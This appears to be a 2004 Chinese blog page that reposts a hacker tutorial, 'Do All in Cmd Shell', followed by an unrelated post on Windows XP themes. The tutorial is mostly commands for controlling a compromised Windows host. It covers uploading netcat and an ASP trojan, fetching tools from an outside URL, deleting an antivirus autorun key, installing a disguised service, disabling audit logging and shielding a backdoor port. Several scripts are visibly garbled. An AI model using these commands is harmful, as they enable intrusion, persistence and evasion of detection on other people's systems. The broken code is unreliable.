2004年08月20日

http://www.icehack.com/

Do All in Cmd Shell

创建时间:2004-05-19
文章属性:转载
文章提交:sFqRy (mqphk163_at_163.com)

目录
1,前言
2,文件传输
3,系统配置
4,网络配置
5,软件安装
6,Windows脚本
7,附言

前言
Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。

文件传输
对于溢出漏洞获得的cmd shell,最大的问题就是如何上传文件。由于蠕虫病毒流行,连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护,通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法,介于其已被大家熟知,本文就不介绍了。还有三种大家熟悉的办法,作为总结我再提一下:

1,用Echo命令写ASP木马。
前提当然是目标主机上已经安装了IIS。
一般的ASP木马“体积”较大,不适合直接用echo命令写入文件,这里我提供一个小巧的。
直接给出echo版:

@echo ^ >up.asp

注意,只有一行,中间没有回车符。
生成的up.asp不能用浏览器访问,只能用下面这个脚本:

with wscript
if .arguments.count>dl.vbs
@echo w.open “get”,.arguments(0),0:w.send:if w.status^>200 then .echo “Error:”+w.status:.quit>>dl.vbs
@echo aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbs

举例——下载ps.exe并保存到c:\path下:

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe

注意,这是在远程shell中执行的。

4,Echo经过编码的任何文件,再用脚本+debug还原。
前面两个办法都不能保证穿过防火墙。而且,除非自己架Web服务器,一般的Web资源都是以压缩文件的形式提供。如果目标主机没有解压工具,还是没辙。那么只有出“杀手锏”了!

echo命令加重定向x作符可以写入ASCII码小于128的字符,但大于等于128的不行。只有将本地文件重新“编码”为可显示的字符,才能方便地写入远程主机。首先能想到的就是base64编码,即email附件的编码方式。但vbs不支持位x作,因此编码和解码较复杂。更麻烦的是,脚本以二进制流方式处理文件的能力很差。(ADODB.Stream可以以流方式写文件,但我无法构造出相应的数据类型。二进制数据流可以用midb函数转成字符串,但反过来不行。我花了两天时间,还是没能解决这个问题。如果有谁能用vbs或js写任意的字节数据到文件中,恳请赐教。)

无奈只有请debug.exe出马了。原理很多人都知道,我不介绍了,直接给出成果——编码脚本:

fp=wscript.arguments(0)
fn=right(fp,len(fp)-instrrev(fp,”\”))
with createobject(“adodb.stream”)
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\65536
with createobject(“scripting.filesystemobject”).opentextfile(fp&”.bat”,2,true)
.write “@echo str=”"”
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt>debug.vbs”+vbcrlf+”@echo +”"”
next
.writeline “”">>debug.vbs”+vbcrlf+”@echo with wscript.stdout:r=vbcrlf”_
+”:for i=1 to len(str) step 48:.write “”e”"+hex(256+(i-1)/2)”_
+”:for j=i to i+46 step 2:.write “” “”+mid(str,j,2):next:.write r:next>>debug.vbs”
.writeline “@echo .write “”rbx”"+r+”"”+hex(slh)+”"”+r+”"rcx”"+r+”"”+hex(sll)_
+”"”+r+”"n debug.tmp”"+r+”"w”"+r+”"q”"+r:end with”_
+”>>debug.vbs&&cscript //nologo debug.vbs│debug.exe>nul&&ren debug.tmp “”"&fn&”"”&del debug.vbs”
end with

将其保存为echo.vbs。假设要上传nc.exe,那么在本地命令行输入命令:

cscript echo.vbs nc.exe

也可以直接把要传输的文件的图标拖放到脚本文件的图标上。
稍等一会儿,在当前目录下将生成一个nc.exe.bat。用记事本等编辑工具打开它,可以看到如下内容:

@echo str=”4D5A90000300000004000000FFFF0000B80000000000
0000400000000000000000000000000000000000000000000
000000000000000000000000000800000000E1FBA0E00B409
CD21B8014CCD21546869732070726F6772616D2063616E6E6
F742062652072756E20696E20444F53206D6F64652E0D0D0A
2400000000000000″_>>debug.vbs
@echo +”504500004C010400B98EAE340000000000000000E0000F0
10B010500009800000062000000000000004C000000100000
00B0000000004000001000000002000004000000000000000
4000000000000000030010000040000000000000300000000
0010000010000000001000001000000000000010000000000
0000000000000″_>>debug.vbs
@echo +”002001003C0000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000
0000000000000000000000000000000A02101006401000000
00000000000000000000000000000000000000000000002E7
4657874000000″_>>debug.vbs
@echo +”70970000001000000098000000040000000000000000000
000000000200000602E726461746100001704000000B00000
00060000009C0000000000000000000000000000400000402
E646174610000004452000000C00000003E000000A2000000
0000000000000000000000400000C02E696461746100005C0
7000000200100″_>>debug.vbs
…………
…………(省略若干行)
…………
@echo +”">>debug.vbs
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write “e”+hex(256+(i-1)/2):for j=i to i+46 step 2:.write ” “+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write “rbx”+r+”0″+r+”rcx”+r+”E800″+r+”n debug.tmp”+r+”w”+r+”q”+r:end with>>debug.vbs&&cscript //nologo debug.vbs│debug.exe>nul&&ren debug.tmp “NC.EXE”&del debug.vbs

全选 -》 复制 -》 切换到远程命令行窗口 -》 粘贴。
如果网速不是很慢的话,整个上传过程大约需要20秒。

几点说明:
1,大的文件传输不稳定,可能会使shell死掉。所以文件越小效果越好。建议原文件不要超过100KB。
2,在传输大文件前,可以先传个小的文件作为“热身”,让16位虚拟机ntvdm.exe驻留后台。所有文件传完后,为隐蔽起见,应该把ntvdm进程杀掉。
3,某些cmd shell每个命令都需要附加两个回车,那nc.exe.bat就不能直接用了。
4,单个命令的长度是有限的,所以不能只用一个echo完成全部任务。而且,对于nc提供的cmd shell,稍长一些的命令竟然会使shell自动退出(溢出了?)。你可以修改”i mod 128=0″语句中的128以调整每个echo命令的长度。每次echo的字符为这个数乘以2。
5,解码过程没有脚本参与也是可以的。使用脚本的目的是减少传输的数据量(因为压缩了数据)。如果有时间,我会写一个更完善的脚本,加强数据压缩能力,增加数据校验功能。

能上传文件当然一切都好办了,但很多x作用Windows自带的工具更方便。在你到处寻找需要的工具时,不要忘了Windows本身。

系统配置
这节包括三方面内容:注册表、服务和组策略。

先说注册表。很多命令行下访问注册表的工具都是交互式的,溢出产生的shell一般不能再次重定向输入/输出流,所以无法使用。好在系统自带的regedit.exe足够用了。

1,读取注册表
先将想查询的注册表项导出,再用type查看,比如:

C:\>regedit /e 1.reg “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp”

C:\>type 1.reg │ find “PortNumber”
“PortNumber”=dword:00000d3d

C:\>del 1.reg

所以终端服务的端口是3389(十六进制d3d)

2,修改/删除注册表项
先echo一个reg文件,然后导入,比如:

echo Windows Registry Editor Version 5.00 >1.reg
echo. >>1.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] >>1.reg
echo “TelnetPort”=dword:00000913 >>1.reg
echo “NTLM”=dword:00000001 >>1.reg
echo. >>1.reg
regedit /s 1.reg

将telnet服务端口改为2323(十六进制913),NTLM认证方式为1。

要删除一个项,在名字前面加减号,比如:

[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U]

要删除一个值,在等号后面用减号,比如:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“KAVRun”=-

3,用inf文件访问注册表
上面对注册表的三个x作,也可以用下面这个inf文件来实现:

[Version]
Signature=”$WINDOWS NT$”
[DefaultInstall]
AddReg=My_AddReg_Name
DelReg=My_DelReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,TelnetPort,0×00010001,2323
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,NTLM,0×00010001,1
[My_DelReg_Name]
HKLM,SYSTEM\CurrentControlSet\Services\Serv-U
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun

将它写入c:\path\reg.inf然后用下面这个命令“安装”:

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\path\reg.inf

几点说明:
1,[Version]和[DefaultInstall]是必须的,AddReg和DelReg至少要有一个。My_AddReg_Name和My_DelReg_Name可以自定义。
0×00010001表示REG_DWORD数据类型,0×00000000或省略该项(保留逗号)表示REG_SZ(字符串)。0×00020000表示REG_EXPAND_SZ。2323也可以用0×913代替。
关于inf文件的详细信息,可以参考DDK帮助文档。
2,InstallHinfSection是大小写敏感的。它和setupapi之间只有一个逗号,没有空格。128表示给定路径,该参数其他取值及含义参见MSDN。特别注意,最后一个参数,必须是inf文件的全路径,不要用相对路径。
3,inf文件中的项目都是大小写不敏感的。

接下来说服务。如果想启动或停止服务,用net命令就可以。但想增加或删除服务,需要用SC,instsrv.exe,xnet.exe等工具。而这些工具系统没有自带(XP和2003自带SC)。导入注册表虽然可以,但效果不好,这里我们请inf文件出马。

增加一个服务:

[Version]
Signature=”$WINDOWS NT$”
[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
[My_AddService_Name]
DisplayName=Windows Internet Service
Description=提供对 Internet 信息服务管理的支持。
ServiceType=0×10
StartType=2
ErrorControl=0
ServiceBinary=%11%\inetsvr.exe

保存为inetsvr.inf,然后:

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\path\inetsvr.inf

这个例子增加一个名为inetsvr的服务(是不是很像系统自带的服务,呵呵)。

几点说明:
1,最后四项分别是
服务类型:0×10为独立进程服务,0×20为共享进程服务(比如svchost);
启动类型:0 系统引导时加载,1 OS初始化时加载,2 由SCM(服务控制管理器)自动启动,3 手动启动,4 禁用。
(注意,0和1只能用于驱动程序)
错误控制:0 忽略,1 继续并警告,2 切换到LastKnownGood的设置,3 蓝屏。
服务程序位置:%11%表示system32目录,%10%表示系统目录(WINNT或Windows),%12%为驱动目录system32\drivers。其他取值参见DDK。你也可以不用变量,直接使用全路径。

这四项是必须要有的。

2,除例子中的六个项目,还有LoadOrderGroup、Dependencies等。不常用所以不介绍了。
3,inetsvr后面有两个逗号,因为中间省略了一个不常用的参数flags。

删除一个服务:

[Version]
Signature=”$WINDOWS NT$”
[DefaultInstall.Services]
DelService=inetsvr

很简单,不是吗?

当然,你也可以通过导入注册表达到目的。但inf自有其优势。
1,导出一个系统自带服务的注册表项,你会发现其执行路径是这样的:
“ImagePath”=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,74,\
00,6c,00,6e,00,74,00,73,00,76,00,72,00,2e,00,65,00,78,00,65,00,00,00
可读性太差。其实它就是%SystemRoot%\system32\tlntsvr.exe,但数据类型是REG_EXPAND_SZ。当手动导入注册表以增加服务时,这样定义ImagePath显然很不方便。而使用inf文件就完全没有这个问题,ServiceBinary(即ImagePath)自动成为REG_EXPAND_SZ。
2,最关键的是,和用SC等工具一样,inf文件的效果是即时起效的,而导入reg后必须重启才有效。
3,inf文件会自动为服务的注册表项添加一个Security子键,使它看起来更像系统自带的服务。

另外,AddService和DelService以及AddReg、DelReg可以同时且重复使用。即可以同时增加和删除多个服务和注册表项。详细的内容还是请查看DDK。

最后说说组策略。组策略是建立Windows安全环境的重要手段,尤其是在Windows域环境下。一个出色的系统管理员,应该能熟练地掌握并应用组策略。在窗口界面下访问组策略用gpedit.msc,命令行下用secedit.exe。

先看secedit命令语法:
secedit /analyze
secedit /configure
secedit /export
secedit /validate
secedit /refreshpolicy
5个命令的功能分别是分析组策略、配置组策略、导出组策略、验证模板语法和更新组策略。其中
secedit /refreshpolicy 在XP/2003下被gpupdate代替。这些命令具体的语法自己在命令行下查看就知道了。

与访问注册表只需reg文件不同的是,访问组策略除了要有个模板文件(还是inf),还需要一个安全数据库文件(sdb)。要修改组策略,必须先将模板导入安全数据库,再通过应用安全数据库来刷新组策略。来看个例子:

假设我要将密码长度最小值设置为6,并启用“密码必须符合复杂性要求”,那么先写这么一个模板:

[version]
signature=”$CHICAGO$”
[System Access]
MinimumPasswordLength = 6
PasswordComplexity = 1

保存为gp.inf,然后导入:

secedit /configure /db gp.sdb /cfg gp.inf /quiet

这个命令执行完成后,将在当前目录产生一个gp.sdb,它是“中间产品”,你可以删除它。
/quiet参数表示“安静模式”,不产生日志。但根据我的试验,在2000sp4下该参数似乎不起作用,XP下正常。日志总是保存在%windir%\security\logs\scesrv.log。你也可以自己指定日志以便随后删除它。比如:

secedit /configure /db gp.sdb /cfg gp.inf /log gp.log
del gp.*

另外,在导入模板前,还可以先分析语法是否正确:

secedit /validate gp.inf

那么,如何知道具体的语法呢?当然到MSDN里找啦。也有偷懒的办法,因为系统自带了一些安全模板,在%windir%\security\templates目录下。打开这些模板,基本上包含了常用的安全设置语法,一看就懂。

再举个例子——关闭所有的“审核策略”。(它所审核的事件将记录在事件查看器的“安全性”里)。
echo版:

echo [version] >1.inf
echo signature=”$CHICAGO$” >>1.inf
echo [Event Audit] >>1.inf
echo AuditSystemEvents=0 >>1.inf
echo AuditObjectAccess=0 >>1.inf
echo AuditPrivilegeUse=0 >>1.inf
echo AuditPolicyChange=0 >>1.inf
echo AuditAccountManage=0 >>1.inf
echo AuditProcessTracking=0 >>1.inf
echo AuditDSAccess=0 >>1.inf
echo AuditAccountLogon=0 >>1.inf
echo AuditLogonEvents=0 >>1.inf
secedit /configure /db 1.sdb /cfg 1.inf /log 1.log /quiet
del 1.*

也许有人会说:组策略不是保存在注册表中吗,为什么不直接修改注册表?因为不是所有的组策略都保存在注册表中。比如“审核策略”就不是。你可以用regsnap比较修改该策略前后注册表的变化。我测试的结果是什么都没有改变。只有“管理模板”这一部分是完全基于注册表的。而且,知道了具体位置,用哪个方法都不复杂。

比如,XP和2003的“本地策略”-》“安全选项”增加了一个“本地帐户的共享和安全模式”策略。XP下默认的设置是“仅来宾”。这就是为什么用管理员帐号连接XP的ipc$仍然只有Guest权限的原因。可以通过导入reg文件修改它为“经典”:

echo Windows Registry Editor Version 5.00 >1.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>1.reg
echo “forceguest”=dword:00000000 >>1.reg
regedit /s 1.reg
del 1.reg

而相应的用inf,应该是:

echo [version] >1.inf
echo signature=”$CHICAGO$” >>1.inf
echo [Registry Values] >>1.inf
echo MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0 >>1.inf
secedit /configure /db 1.sdb /cfg 1.inf /log 1.log
del 1.*

关于命令行下读取组策略的问题。
系统默认的安全数据库位于%windir%\security\database\secedit.sdb,将它导出至inf文件:

secedit /export /cfg gp.inf /log 1.log

没有用/db参数指定数据库就是采用默认的。然后查看gp.inf。

不过,这样得到的只是组策略的一部分(即“Windows设置”)。而且,某个策略如果未配置,是不会被导出的。比如“重命名系统管理员帐户”,只有被定义了才会在inf文件中出现NewAdministratorName=”***”。对于无法导出的其他的组策略只有通过访问注册表来获得了。
此办法在XP和2003下无效——可以导出但内容基本是空的。原因不明。根据官方的资料,XP和2003显示组策略用RSoP(组策略结果集)。相应的命令行工具是gpresult。
但是,它获得的是在系统启动时被附加(来自域)的组策略,单机测试结果还是“空”。所以,如果想知道某些组策略是否被设置,只有先写一个inf,再用secedit /analyze,然后查看日志了。

网络配置
Windows自带的关于网络的命令行工具很多,比如大家熟悉的ping, tracert, ipconfig, telnet, ftp, tftp, netstat,还有不太熟悉的nbtstat, pathping, nslookup, finger, route, netsh……
这些命令又可分成三类:网络检测(如ping)、网络连接(如telnet)和网络配置(如netsh)。前面两种相对简单,本文只介绍两个网络配置工具。

netsh
在远程shell中使用netsh首先要解决一个交互方式的问题。前面说过,很多shell不能再次重定向输出输出,所以不能在这种环境下交互地使用ftp等命令行工具。解决的办法是,一般交互式的工具都允许使用脚本(或者叫应答文件)。比如ftp -s:filename。netsh也是这样:netsh -f filename。

netsh命令的功能非常多,可以配置IAS、DHCP、RAS、WINS、NAT服务器,TCP/IP协议,IPX协议,路由等。我们不是管理员,一般没必要了解这么多,只需用netsh来了解目标主机的网络配置信息。

1,TCP/IP配置

echo interface ip >s
echo show config >>s
netsh -f s
del s

由此你可以了解该主机有多个网卡和IP,是否是动态分配IP(DHCP),内网IP是多少(如果有的话)。这个命令和ipconfig /all差不多。

注意,以下命令需要目标主机启动remoteaccess服务。如果它被禁用,请先通过导入注册表解禁,然后net start remoteaccess

2,ARP

echo interface ip >s
echo show ipnet >>s
netsh -f s
del s

这个比arp -a命令多一点信息。

3,TCP/UDP连接

echo interface ip >s
echo show tcpconn >>s
echo show udpconn >>s
netsh -f s
del s

这组命令和netstat -an一样。

4,网卡信息
如果netsh命令都有其他命令可代替,那它还有什么存在的必要呢?下面这个就找不到代替的了。

echo interface ip >s
echo show interface >>s
netsh -f s
del s

netsh的其他功能,比如修改IP,一般没有必要使用(万一改了IP后连不上,就“叫天不应叫地不灵”了),所以全部略过。

IPSec
首先需要指出的是,IPSec和TCP/IP筛选是不同的东西,大家不要混淆了。TCP/IP筛选的功能十分有限,远不如IPSec灵活和强大。下面就说说如何在命令行下控制IPSec。

XP系统用ipseccmd,2000下用ipsecpol。遗憾的是,它们都不是系统自带的。ipseccmd在xp系统安装盘的 SUPPORT\TOOLS\SUPPORT.CAB 中,ipsecpol在2000 Resource Kit里。而且,要使用ipsecpol还必须带上另外两个文件:ipsecutil.dll和text2pol.dll。三个文件一共119KB。

IPSec可以通过组策略来控制,但我找遍MSDN,也没有找到相应的安全模板的语法。已经配置好的IPSec策略也不能被导出为模板。所以,组策略这条路走不通。IPSec的设置保存在注册表中
(HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local),理论上可以通过修改注册表来配置IPSec。但很多信息以二进制形式存放,读取和修改都很困难。相比之下,上传命令行工具更方便。

关于ipsecpol和ipseccmd的资料,网上可以找到很多,因此本文就不细说了,只是列举一些实用的例子。
在设置IPSec策略方面,ipseccmd命令的语法和ipsecpol几乎完全一样,所以只以ipsecpol为例:

1,防御rpc-dcom攻击

ipsecpol -p myfirewall -r rpc-dcom -f *+0:135:tcp *+0:135:udp *+0:137:udp *+0:138:udp *+0:139:tcp *+0:445:tcp *+0:445:udp -n BLOCK -w reg -x

这条命令关闭了本地主机的TCP135,139,445和udp135,137,138,445端口。
具体含义如下:
-p myfirewall 指定策略名为myfirewall
-r rpc-dcom 指定规则名为rpc-dcom
-f …… 建立7个筛选器。*表示任何地址(源);0表示本机地址(目标);+表示镜像(双向)筛选。详细语法见ipsecpol -?
-n BLOCK 指定筛选x作是“阻塞”。注意,BLOCK必须是大写。
-w reg 将配置写入注册表,重启后仍有效。
-x 立刻激活该策略。

2,防止被ping

ipsecpol -p myfirewall -r antiping -f *+0::icmp -n BLOCK -w reg -x

如果名为myfirewall的策略已存在,则antiping规则将添加至其中。
注意,该规则同时也阻止了该主机ping别人。

3,对后门进行IP限制
假设你在某主机上安装了DameWare Mini Remote Control。
为了保护它不被别人暴破密码或溢出,应该限制对其服务端口6129的访问。

ipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:tcp -n BLOCK -w reg
ipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.89+0:6129:tcp -n PASS -w reg -x

这样就只有123.45.67.89可以访问该主机的6129端口了。
如果你是动态IP,应该根据IP分配的范围设置规则。比如:

ipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:tcp -n BLOCK -w reg
ipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.*+0:6129:tcp -n PASS -w reg -x

这样就允许123.45.67.1至123.45.67.254的IP访问6129端口。

在写规则的时候,应该特别小心,不要把自己也阻塞了。如果你不确定某个规则的效果是否和预想的一样,可以先用计划任务“留下后路”。例如:

c:\>net start schedule
Task Scheduler 服务正在启动 ..
Task Scheduler 服务已经启动成功。

c:\>time /t
12:34

c:\>at 12:39 ipsecpol -p myfw -y -w reg
新加了一项作业,其作业 ID = 1

然后,你有5分钟时间设置一个myfw策略并测试它。5分钟后计划任务将停止该策略。如果测试结果不理想,就删除该策略。

c:\>ipsecpol -p myfw -o -w reg

注意,删除策略前必须先确保它已停止。不停止它的话,即使删除也会在一段时间内继续生效。持续时间取决于策略的刷新时间,默认是180分钟。

如果测试通过,那么就启用它。

c:\>ipsecpol -p myfw -x -w reg

最后说一下查看IPSec策略的办法。
对于XP很简单,一条命令搞定——ipseccmd show filters
而ipsecpol没有查询的功能。需要再用一个命令行工具netdiag。它位于2000系统安装盘的SUPPORT\TOOLS\SUPPORT.CAB中。(已经上传了三个文件,也就不在乎多一个了。)

netdiag需要RemoteRegistry服务的支持。所以先启动该服务:

net start remoteregistry

不启动RemoteRegistry就会得到一个错误:

[FATAL] Failed to get system information of this machine.

netdiag这个工具功能十分强大,与网络有关的信息都可以获取!不过,输出的信息有时过于详细,超过命令行控制台cmd.exe的输出缓存,而不是每个远程cmd shell都可以用more命令来分页的。

查看ipsec策略的命令是:
netdiag /debug /test:ipsec

然后是一长串输出信息。IPSec策略位于最后。

软件安装
一个软件/工具的安装过程,一般来说只是做两件事:拷贝文件到特定目录和修改注册表。只要搞清楚具体的内容,那么就可以自己在命令行下实现了。(不考虑安装后需要注册激活等情况)

WinPcap是个很常用的工具,但必须在窗口界面下安装。在网上也可以找到不用GUI的版本(但还是有版权页),其实我们完全可以自己做一个。

以WinPcap 3.0a 为例。通过比较安装前后的文件系统和注册表快照,很容易了解整个安装过程。
除去反安装的部分,关键的文件有三个:wpcap.dll,packet.dll和npf.sys。前面两个文件位于system32目录下,第三个在system32\drivers下。而注册表的变化是增加了一个系统服务NPF。注意,是系统服务(即驱动)不是Win32服务。

作为系统服务,不但要在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services下增加主键,在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root下也增加主键。而后者默认只有SYSTEM身份才可以修改。幸运的是,并不需要手动添加它,winpcap被调用时会自动搞定。甚至完全不用手动修改注册表,所有的事winpcap都会自己完成,只需要将三个文件复制到合适的位置就行了。

作为范例,还是演示一下如何修改注册表:利用前面说过的inf文件来实现。

[Version]
Signature=”$WINDOWS NT$”
[DefaultInstall.Services]
AddService=NPF,,winpcap_svr
[winpcap_svr]
DisplayName=Netgroup Packet Filter
ServiceType=0×1
StartType=3
ErrorControl=1
ServiceBinary=%12%\npf.sys

将上面这些内容保存为_wpcap_.inf文件。
再写一个批处理_wpcap_.bat:

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %CD%\_wpcap_.inf
del _wpcap_.inf
if /i %CD%==%SYSTEMROOT%\system32 goto COPYDRV
copy packet.dll %SYSTEMROOT%\system32\
copy wpcap.dll %SYSTEMROOT%\system32\
del packet.dll
del wpcap.dll
:COPYDRV
if /i %CD%==%SYSTEMROOT%\system32\drivers goto END
copy npf.sys %SYSTEMROOT%\system32\drivers\
del npf.sys
:END
del %0

然后用winrar将所有文件(5个)打包为自解压的exe,并将『高级自解压选项』->『解压后运行』设置为_wpcap_.bat,命令行的winpcap安装包就制作完成了。

注意,批处理最后一行没有回车符。否则会因为正在运行而无法删除自己。

所有的软件安装,基本上可以套用这个思路。但也有例外的,那就是系统补丁的安装。幸好,Windows补丁包支持命令行安装。
比如:

KB824146.exe -n -z -q

-n 不保留备份
-z 不重起
-q 安静模式

如果有一堆补丁要打,那么用RAR打包成自解压文件,外加一个批处理。

for %%f in (KB??????.exe) do %%f -n -z -q
for %%f in (KB??????.exe) do del %%f
del %0

Windows脚本
很多事用脚本来做是很简洁的。下面给出几个常用脚本的echo版。

1,显示系统版本

@echo for each ps in getobject _ >ps.vbs
@echo (“winmgmts:\\.\root\cimv2:win32_operatingsystem”).instances_ >>ps.vbs
@echo wscript.echo ps.caption^&” “^&ps.version:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs

2,列举进程

@echo for each ps in getobject _ >ps.vbs
@echo (“winmgmts:\\.\root\cimv2:win32_process”).instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs

3,终止进程

@echo for each ps in getobject _ >pk.vbs
@echo (“winmgmts:\\.\root\cimv2:win32_process”).instances_ >>pk.vbs
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pk.vbs

要终止PID为123的进程,使用如下语法:
cscript pk.vbs 123

如果显示一个0,表示终止成功。

然后:
del pk.vbs

4,重启系统

@echo for each os in getobject _ >rb.vbs
@echo (“winmgmts:{(shutdown)}!\\.\root\cimv2:win32_operatingsystem”).instances_ >>rb.vbs
@echo os.win32shutdown(2):next >>rb.vbs & cscript //nologo rb.vbs & del rb.vbs

5,列举自启动的服务

@echo for each sc in getobject(“winmgmts:\\.\root\cimv2:win32_service”).instances_ >sc.vbs
@echo if sc.startmode=”Auto” then wscript.echo sc.name^&” – “^&sc.pathname >>sc.vbs
@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs

6,列举正在运行的服务

@echo for each sc in getobject(“winmgmts:\\.\root\cimv2:win32_service”).instances_ >sc.vbs
@echo if sc.state=”Running” then wscript.echo sc.name^&” – “^&sc.pathname >>sc.vbs
@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs

7,显示系统最后一次启动的时间

@echo for each os in getobject _ >bt.vbs
@echo (“winmgmts:\\.\root\cimv2:win32_operatingsystem”).instances_ >>bt.vbs
@echo wscript.echo os.lastbootuptime:next >>bt.vbs & cscript //nologo bt.vbs & del bt.vbs

显示结果的格式是:
yyyymmddHHMMSS******ZZZZ
_年_月日时分秒_微秒_时区

8,显示系统运行时间

@echo for each os in getobject _ >rt.vbs
@echo (“winmgmts:\\.\root\cimv2:win32_perfrawdata_perfos_system”).instances_ >>rt.vbs
@echo s=os.timestamp_sys100ns:l=len(s):s=left(s,l-7):for i=1 to l-7 >>rt.vbs
@echo t=t^&mid(s,i,1)=t\86400:r=r^&d:t=t mod 86400:next >>rt.vbs
@echo wscript.echo cint?^&”d “^&t\3600^&”h “^&t\60 mod 60^&”m “^&t mod 60^&”s”:next >>rt.vbs
cscript //nologo rt.vbs & del rt.vbs

这个运行时间是从性能计数器中获得的64位整型数,不会出现在49.7天后溢出的情况。

附言
cmd shell博大精深,本文挂一漏万讲了一些常用技巧,希望对各位有所帮助。

也许你早知道了这些方法,也许你有更好的方法,希望你能写出来和大家分享。

最后,感谢你耐心看完本文。本人水平有限,错误之处恳请指正。

2004年08月16日

http://www.pcpchina.com/bbs/index.php?showtopic=114&hl=系统信息

做个“好色”的电脑——前言

  我想把这个帖子写成一个系列的教程。由于时间和精力毕竟有限,所以难免存在疏漏和错误,还请大家多包涵。
  从win9x开始,我就开始了对windows系统 的主题修改,在那个年代,win9x自带一个简陋的themes系统,针对主题的修改在那时候还只是个概念,后来是win200 0,在这个系 统里,microsoft 摒弃了本不成熟的theme系统,以致于在这样一个系统环境下,改变系统的默认风格变得十分困难。直到现在,终于出现了一个可以 良好支持theme的系统——winxp,不过,不知道出于什么原因,microsoft并没有放开这个主题标准,使得在未经过 修改的系统上不能使用来自第三方的桌面主题!而这个限制来自于uxtheme.dll和“系统文件保护”功能这两个方面,幸好有 国外高手破*了uxtheme.dll文件,使得无限制地使用第三方的主题成为了可能,在接下来的一系列教程里,我会逐一教大家 如何打造一个符合自己个性的桌面主题!

  ——这篇文章版权归作者本人和先锋网所有,如需要转载的,请和本人联系!
  我对转载的意见是,对于非盈利网站转载的,只需通知我,并注明原作者,和转载的原地址。对于盈利性网站,一般不得转载,因为我曾经答应过《计算机应用文摘》的编辑,一年以内不在国内盈利性质的媒体上发表类似文章

特别提示:如有意转载本文的网站,只要能对先锋网目前困境做出任何实效性帮助的,可以优先考虑授权问题,本文作者可承诺无偿修改.

做个“好色”的电脑——疑难篇

关于资源消耗
对于桌面主题,很多朋友都说这只是花俏的东西,我自 己也承认这种 观点,而且, 桌面主题和系统操作没有必然的联系,又要使用大量的图片资源,所以对资源的占用是肯定的!至于到底占用多少,这个问题也不是笼统 的能概括的,但是可以这样来看——我们以xp自带的LUNA主题作为参照,把windows经典看做是不消耗资源的界面,那lu na的资源占用大概在4-5m之间(这个数字可能不怎么准确,仅作为参考),有些主题如watercolor,资源占用大概是l una的一半,而我使用过最不消耗资源的主题叫做simple,只有几百k。用最简单的办法来判断一个主题对资源的消耗大小—— 在主题中只包含一个配色方案的情况下 ,就是看这个主题文件本身的大小,有的主题文件有8m大,你说这样的主题要占用多少资源,我敢肯定这一定比luna消耗得多!还 有就是比较科学的方法,如果你会自己修改或者制作主题的话,你可以用stylebulider导出一个主题来看看,看里面到底包 含了多少图片资源,这就可以和其他的主题做一个系统的比较了!

关于替换样式
这里的样式指的是窗口以及按钮等的样式,和主题是不 同的概念,主 题是指样式(也称为可视化样式:visualstyle)、图标、鼠标样式等等的集合。首先,xp还是xp,只是视觉上的效果变 了,你可以去 找找其他的网站,有很多地方提供主题的(我在后面会附上一些资源链接),使用方法是,把下载回来的主题解压,直接点里面的*.m sstyles文件,就可以在出现的“显示属性”对话框中看到新样式的预览了,但是这样是不会出现在“显示属性”的“主题”标签 下,如果你想让新主题出现在这里,需要把文件放到 %SystemRoot%\Resources\themes目录下。

关于样式的修改
这里说的修改,是针对一些在字体方面不能让大家满意 的一些主题, 由于制作者的 使用环境问题(大多是外国人制作的,而国外现在有很多人都是使用1280*1024的分辨率),造成很多样式的字体偏小,不适合 中国国情,这就需要我们对这些主题做一些修改~~~,修改需要用到两个工具,一个是stylebulider,另一个是文本编辑 工具(如ultraEDIT,EditPlus),在后面的教程中我会详细介绍如何修改一个样式中的字体等资源。

关于适用的系统
